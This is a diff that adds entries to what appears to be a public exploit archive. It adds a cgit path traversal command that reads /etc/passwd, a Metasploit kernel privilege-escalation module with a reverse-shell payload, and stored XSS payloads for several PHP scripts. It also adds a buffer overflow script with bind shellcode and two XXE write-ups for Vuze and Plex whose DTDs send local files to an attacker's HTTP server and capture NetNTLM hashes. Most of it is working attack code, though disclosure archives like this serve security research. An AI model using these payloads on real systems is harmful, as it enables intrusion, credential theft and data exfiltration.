diff --git a/exploits/cgi/webapps/45148.txt b/exploits/cgi/webapps/45148.txt
new file mode 100644
index 000000000..2078712ee
--- /dev/null
+++ b/exploits/cgi/webapps/45148.txt
@@ -0,0 +1,25 @@
+There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
+
+void cgit_clone_objects(void)
+{
+    if (!ctx.qry.path) {
+        cgit_print_error_page(400, "Bad request", "Bad request");
+        return;
+    }
+
+    if (!strcmp(ctx.qry.path, "info/packs")) {
+        print_pack_info();
+        return;
+    }
+
+    send_file(git_path("objects/%s", ctx.qry.path));
+}
+
+send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
+git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
+
+ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:
+
+$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
\ No newline at end of file
diff --git a/exploits/linux/local/45147.rb b/exploits/linux/local/45147.rb
new file mode 100755
index 000000000..51fa92bcd
--- /dev/null
+++ b/exploits/linux/local/45147.rb
@@ -0,0 +1,197 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Linux systems by abusing
+        UDP Fragmentation Offload (UFO).
+
+        This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
+        4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros
+        based on Ubuntu, such as Linux Mint.
+
+        The target system must have unprivileged user namespaces enabled
+        and SMAP disabled.
+
+        Bypasses for SMEP and KASLR are included. Failed exploitation
+        may crash the kernel.
+
+        This module has been tested successfully on various Ubuntu and Linux
+        Mint systems, including:
+
+        Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;
+        Ubuntu 16.04 4.8.0-53-generic;
+        Linux Mint 17.3 4.4.0-89-generic;
+        Linux Mint 18 4.8.0-58-generic
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrey Konovalov', # Discovery and C exploit
+          'h00die',           # Metasploit module
+          'Brendan Coles'     # Metasploit module
+        ],
+      'DisclosureDate' => 'Aug 10 2017',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          [ 'CVE', '2017-1000112' ],
+          [ 'EDB', '43418' ],
+          [ 'BID', '100262' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2017/q3/277' ],
+          [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ],
+          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ],
+          [ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ],
+          [ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ],
+          [ 'URL', 'https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112' ]
+        ],
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+    output = cmd_exec gcc_cmd
+    rm_f "#{path}.c"
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    cmd_exec "chmod +x #{path}"
+  end
+
+  def exploit_data(file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file
+    fd = ::File.open path, 'rb'
+    data = fd.read fd.stat.size
+    fd.close
+    data
+  end
+
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_gcc?
+      vprint_good 'gcc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    version = kernel_release
+    unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|45|47|51|53|57|59|62|63|64|66|67|70|71|72|75|78|79|81|83|87|89|81|89)-generic/ ||
+           version =~ /^4\.8\.0-(34|36|39|41|45|46|49|51|52|53|54|56|58)-generic/
+      vprint_error "Linux kernel version #{version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Linux kernel version #{version} is vulnerable"
+
+    vprint_status 'Checking if SMAP is enabled ...'
+    if smap_enabled?
+      vprint_error 'SMAP is enabled'
+      return CheckCode::Safe
+    end
+    vprint_good 'SMAP is not enabled'
+
+    arch = kernel_hardware
+    unless arch.include? 'x86_64'
+      vprint_error "System architecture #{arch} is not supported"
+      return CheckCode::Safe
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    unless userns_enabled?
+      vprint_error 'Unprivileged user namespaces are not permitted'
+      return CheckCode::Safe
+    end
+    vprint_good 'Unprivileged user namespaces are permitted'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload exploit executable
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile executable_path, exploit_data('exploit.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx executable_path, exploit_data('exploit.out')
+    end
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Launch exploit
+    print_status 'Launching exploit ...'
+    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}"
+    output.each_line { |line| vprint_status line.chomp }
+    print_status "Cleaning up #{payload_path} and #{executable_path} ..."
+    rm_f executable_path
+    rm_f payload_path
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/45140.txt b/exploits/php/webapps/45140.txt
new file mode 100644
index 000000000..86a3fe1e3
--- /dev/null
+++ b/exploits/php/webapps/45140.txt
@@ -0,0 +1,40 @@
+*******************************************************************************************
+# Exploit Title:  PHP Scripts Mall Basic B2B Script 2.0.0 has  Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
+# Date: 20.07.2018
+# Site Titel : B2B Script
+# Vendor Homepage:  https://www.phpscriptsmall.com/
+#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
+# Software Link: http://readymadeb2bscript.com/basic-b2b/
+# Category: Web Application
+# Version: 2.0.9
+# Exploit Author: Vikas Chaudhary
+# Contact: https://www.facebook.com/profile.php?id=100011287630308
+# Web:  https://gkaim.com/
+#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/
+# Tested on: Windows 10 -Firefox
+# CVE- CVE-2018-14541
+
+*****************************************************************************************
+ 
+Proof of Concept:-
+--------------------------
+1. Go  to the  site (https://www.server.com/professional-b2b-script/ ).
+2- Click on Join Free =>  Fill the Form and Create an Account  using your name email and soo on ...
+3- Goto your mail and Verify it.
+4-Come back to site and Login using your Verified Mail and Password.
+6- When loged in ,goto My Profile  => Edit Profile and fill the these Scripts in given  parameter.
+
+             in FIRST NAME =>         "><img src=x onerror=prompt(/VIKAS/)>
+             in LAST NAME =>        "><img src=x onerror=prompt(/CHAUDHARY/)>
+             in ADDRESS 1 =>            "><img src=x onerror=prompt(/MYAIM/)>
+             in ADDRESS 2 =>     "><img src=x onerror=prompt(/GKAIM/)>
+             in CITY =>       "><img src=x onerror=prompt(/HRFP/)>
+             in STATE =>     "><img src=x onerror=prompt(/ETHICAL/)>
+             in COMPANY NAME =>    "><img src=x onerror=prompt(/HACKER/)>
+
+Now click on SUBMIT and refresh the page 
+
+
+You will having popup of /VIKAS/  ,  /CHAUDHARY/ , / MYAIM/ .  /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/  in you account..
+
+***************************************************************************************
\ No newline at end of file
diff --git a/exploits/php/webapps/45141.txt b/exploits/php/webapps/45141.txt
new file mode 100644
index 000000000..cd54bf9fc
--- /dev/null
+++ b/exploits/php/webapps/45141.txt
@@ -0,0 +1,28 @@
+*******************************************************************************************
+# Exploit Title:  Entrepreneur Job Portal Script 3.0.1-  has Stored XSS via Search bar and Location 
+# Date: 14.07.2018
+# Site Titel : JOB SITE (Job Portal)
+# Vendor Homepage:  https://www.phpscriptsmall.com/
+#Vendor Software: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/
+# Software Link:   http://freelancewebdesignerchennai.com/demo/job-portal/ 
+# Category: Web Application
+# Version: 3.0.1
+# Exploit Author: Vikas Chaudhary
+# Contact: https://www.facebook.com/profile.php?id=100011287630308
+# Web:  https://gkaim.com/
+#Published On: https://gkaim.com/cve-2018-14082-vikas-chaudhary/
+# Tested on: Windows 10 -Firefox ,
+# CVE: CVE-2018-14082
+*****************************************************************************************
+------------------------------------------------------ .
+Proof of Concept:- 
+-------------------------------------------------------
+1. Go  to the  site ( http://server.com/job-portal/ ) .
+2- Click on  REGISTER page  (Register now) .
+3- Register by giving you name ,mail and soo on...
+4- Verify your mail
+5- Come to side and login using your verified mail
+6 -When you Loged in 
+In search bar (keywords, skills , Destination) paste   "><svg/onload=alert(/VIKAS/)>  and in location paste  "><svg/onload=alert(/CHAUDHARY/)>  and click on Search
+ 
+7-You will have 2 popup=> /VIKAS/   and  /CHAUDHARY/
\ No newline at end of file
diff --git a/exploits/php/webapps/45143.txt b/exploits/php/webapps/45143.txt
new file mode 100644
index 000000000..660dea6e9
--- /dev/null
+++ b/exploits/php/webapps/45143.txt
@@ -0,0 +1,32 @@
+*******************************************************************************************
+# Exploit Title:  PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name 
+# Date: 02.08.2018
+# Site Titel : Exclusive Scripts
+# Vendor Homepage:  https://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/
+# Category: Web Application
+# Version: 3.0.6
+# Exploit Author: Sarafraz Khan
+# Contact: https://www.facebook.com/sarfraj.khan.79
+# Web:  https://goglequeens.com
+# Tested on: Windows 10 -Firefox
+# CVE-2018-14869
+*****************************************************************************************
+ 
+Proof of Concept:-
+--------------------------
+1. Go  to the  site ( http://www.server.com/ ) .
+2- Click on => Login => Register => and then fill the Form and click on Register Now
+3-Goto your mail and Verify it.
+4-Now come back to site and Sign in  using your  Verified mail and Password.
+5-Goto Setting => Personal information  and paste these code in 
+    Address line 1 =>         "><img src=x onerror=prompt(/SARAFRAZ/)>
+    Address Line 2 =>        "><img src=x onerror=prompt(/KHAN/)>
+     Bank name  =>            "><img src=x onerror=prompt(/KING/)>
+    A/C Holder name =>     "><img src=x onerror=prompt(/GOOGLEQUEENS/)>
+
+  and then click on Update Profile.
+
+6-Now You will having popup of /SARAFRAZ/  ,  /KHAN/ , / KING/ and /GOOGLEQUEENS/  in you account..
+
+***************************************************************************************
\ No newline at end of file
diff --git a/exploits/windows/local/45142.py b/exploits/windows/local/45142.py
new file mode 100755
index 000000000..00634fcba
--- /dev/null
+++ b/exploits/windows/local/45142.py
@@ -0,0 +1,59 @@
+###########################################################################################
+# Exploit Title: Socumsoft Wedding Slideshow Studio 1.36
+# Date: 02.08.2018
+# Exploit Author: Achilles
+# Vendor Homepage: http://www.socusoft.com
+# Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe
+# Tested on OS: Windows 7 64-bit DE
+# Steps to reproduce: Copy the contents of the file (Evil.txt)
+# and paste in the License Name field click Register and BOOM
+###########################################################################################
+
+#!/usr/bin/env python
+
+
+file = open("Evil.txt","wb")
+junk = "\x41" * 512
+nseh = "\x90\x90\xeb\x06" #jmp short 6
+seh =  "\x91\x54\x01\x10" #pop pop retn DVDPhotoData.dll
+
+nops = "\x90" * 20
+
+buf =  ""
+buf += "\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444
+buf += "\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
+buf += "\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
+buf += "\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
+buf += "\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
+buf += "\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
+buf += "\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
+buf += "\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
+buf += "\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
+buf += "\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
+buf += "\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
+buf += "\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
+buf += "\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
+buf += "\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
+buf += "\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
+buf += "\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
+buf += "\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
+buf += "\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
+buf += "\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
+buf += "\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
+buf += "\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
+buf += "\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
+buf += "\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
+buf += "\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
+buf += "\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
+buf += "\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
+buf += "\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
+buf += "\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
+buf += "\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
+buf += "\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
+buf += "\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
+buf += "\xc8\x28\x1b\xd5\x3f\x51"
+ 
+exploit = junk + nseh + seh + nops + buf
+ 
+file.write(exploit)
+file.close()
\ No newline at end of file
diff --git a/exploits/xml/webapps/45145.txt b/exploits/xml/webapps/45145.txt
new file mode 100644
index 000000000..e1acf5528
--- /dev/null
+++ b/exploits/xml/webapps/45145.txt
@@ -0,0 +1,150 @@
+Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing
+Reserved CVE: CVE-2018-13417
+
+# Vulnerability Overview
+The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
+
+- Access arbitrary files from the filesystem with the same permission as the user account running Vuze.
+- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
+- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
+
+Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
+
+# Discovered By
+Chris Moberly @ The Missing Link Security
+
+# Vendor Status
+Multiple attempts to contact Vuze team resulted in no replies.
+
+# Vulnerability Details
+Attack type: Remote, unauthenticated
+Impact: Information disclosure up to code execution
+Affected component: Vuze Bittorrent Client's SSDP discovery / XML parsing
+Operating Systems affected: Verified Windows 10 (likely all versions)
+Vuze version affected: Tested on 5.7.6.0 (current as of July 2018). Older versions likely also vulnerable.
+Attack vector: XXE
+
+# Technical Overview
+Vuze, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
+
+We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
+
+Vuze will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
+
+By hosting a specially crafted XML file at that location, we can force Vuze to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
+
+```
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
+<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
+]>
+<hello>&xxe;&xxe-url;</hello>
+<root>
+    <specVersion>
+        <major>1</major>
+        <minor>0</minor>
+    </specVersion>
+    <device>
+```
+
+When Vuze parses this, it does two things:
+
+1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
+2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
+
+The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Vuze to automatically access file paths and HTTP URLs.
+
+# POC 1: Capcturing NetNTLM Challenge/Response
+This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
+
+This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
+
+The process is:
+
+1. Execute the evil-ssdp tool as follows from a Linux host:
+
+```
+essdp.py eth0 -t xxe-smb    # instructs tool to use the 'xxe' template for zero-day hunting
+```
+
+2. From the same Linux host, either launch a simple netcat listener like this:
+
+```
+sudo nc -nlvp 445
+```
+
+or use Impacket to listen and extract the NetNTLM challenge/response as follows:
+
+```
+sudo python examples/smbserver.py smb /tmp/smb/
+```
+
+3. From a Windows host on the same network, simply restart Vuze. evil-ssdp will display messages like the following:
+
+```
+[M-SEARCH]     New Host 192.168.1.100, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
+[XML REQUEST]  Host: 192.168.1.100, User-Agent: Azureus 5.7.6.0;Windows 10;Java 1.8.0_121
+               GET /ssdp/device-desc.xml
+[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
+               GET /ssdp/xxe.html
+[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
+               GET /ssdp/xxe.html
+
+```
+
+When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Vuze. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
+
+# POC 2: Accessing Arbitrary Files
+If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Vuze is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
+
+We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
+
+```
+<!DOCTYPE data[
+<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
+<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
+%dtd;
+]>
+<data>&send;</data>
+```
+
+Which triggers another connection request to the following data.dtd file:
+
+```
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
+%all;
+```
+
+We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
+
+To reproduce:
+
+1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Vuze is installed. Please 1 line of text with no whitespaces inside, like this:
+
+```
+secretstuff!
+```
+
+2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
+
+```
+essdp.py eth0 -t xxe-exfil    # instructs tool to use the 'xxe-exfil' template for zero-day hunting
+```
+
+3. Back on the Windows host, simply restart Vuze. evil-ssdp will display messages like the following
+
+```
+[M-SEARCH]     New Host 10.0.200.10, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
+[XML REQUEST]  Host: 192.168.1.100, User-Agent: Azureus 5.7.6.0;Windows 10;Java 1.8.0_121
+               GET /ssdp/device-desc.xml
+[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
+               GET /ssdp/data.dtd
+[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
+               GET /ssdp/data.dtd
+[EXFILTRATION] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
+               GET /?exfiltrated=secretstuff!
+[EXFILTRATION] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
+               GET /?exfiltrated=secretstuff!
+```
\ No newline at end of file
diff --git a/exploits/xml/webapps/45146.txt b/exploits/xml/webapps/45146.txt
new file mode 100644
index 000000000..af2b3af28
--- /dev/null
+++ b/exploits/xml/webapps/45146.txt
@@ -0,0 +1,144 @@
+Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing
+Reserved CVE: CVE-2018-13415
+
+# Vulnerability Overview
+The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
+
+- Access arbitrary files from the filesystem with the same permission as the user account running Plex.
+- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
+- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
+
+Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
+
+# Discovered By
+Chris Moberly @ The Missing Link Security
+
+# Vendor Status
+Disclosed to Plex security team, pending resolution.
+
+# Vulnerability Details
+Attack type: Remote, unauthenticated
+Impact: Information disclosure up to code execution
+Affected component: Plex Media Server's SSDP discovery / parsing with libxml2
+Operating Systems affected: Verified Windows 10 and Ubuntu Linux 18.10 (likely all versions)
+Plex version affected: Tested on 1.13.2.5154 (current as of July 2018). Older versions likely also vulnerable.
+Attack vector: XXE
+
+# Technical Overview
+Plex, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
+
+We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
+
+Plex will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
+
+By hosting a specially crafted XML file at that location, we can force Plex Media Server to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
+
+```
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
+<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
+]>
+<hello>&xxe;&xxe-url;</hello>
+<root>
+    <specVersion>
+        <major>1</major>
+        <minor>0</minor>
+    </specVersion>
+    <device>
+```
+
+When Plex parses this, it does two things:
+
+1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
+2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
+
+The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Plex to automatically access file paths and HTTP URLs. While our POC above uses an SMB share for attacking Windows clients, this could be modified to read local files into a variable and then pass that variable via HTTP to an attacker-controlled server. This type of attack could be used to read the contents of local files (like /etc/passwd in the Linux world).
+
+# POC 1: Capcturing NetNTLM Challenge/Response
+This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
+
+This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
+
+The process is:
+
+1. Execute the evil-ssdp tool as follows from a Linux host:
+
+```
+essdp.py eth0 -t xxe-smb    # instructs tool to use the 'xxe' template for zero-day hunting
+```
+
+2. From the same Linux host, either launch a simple netcat listener like this:
+
+```
+sudo nc -nlvp 445
+```
+
+or use Impacket to listen and extract the NetNTLM challenge/response as follows:
+
+```
+sudo python examples/smbserver.py smb /tmp/smb/
+```
+
+3. From a Windows host on the same network, simply restart Plex. evil-ssdp will display messages like the following:
+
+```
+[M-SEARCH]     New Host 192.168.1.100, Service Type: ssdp:all
+[XML REQUEST]  Host: 192.168.1.100, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
+               GET /ssdp/device-desc.xml
+[XML REQUEST]  Host: 192.168.1.100, User-Agent: DVBLink
+               GET /ssdp/device-desc.xml
+[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
+```
+
+When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Plex. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
+
+# POC 2: Accessing Arbitrary Files
+If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Plex is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
+
+We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
+
+```
+<!DOCTYPE data[
+<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
+<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
+%dtd;
+]>
+<data>&send;</data>
+```
+
+Which triggers another connection request to the following data.dtd file:
+
+```
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
+%all;
+```
+
+We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
+
+To reproduce:
+
+1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Plex is installed. Please 1 line of text with no whitespaces inside, like this:
+
+```
+secretstuff!
+```
+
+2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
+
+```
+essdp.py eth0 -t xxe-exfil    # instructs tool to use the 'xxe-exfil' template for zero-day hunting
+```
+
+3. Back on the Windows host, simply restart Plex. evil-ssdp will display messages like the following
+
+```
+[XML REQUEST]  Host: 192.168.1.100, User-Agent: DVBLink
+               GET /ssdp/device-desc.xml
+[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
+               GET /ssdp/data.dtd
+[EXFILTRATION] Host: 192.168.1.100, User-Agent: None
+               GET /?exfiltrated=secretstuff!
+
+```
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e088e9161..20e43a697 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9223,7 +9223,7 @@ id,file,description,date,author,type,platform,port
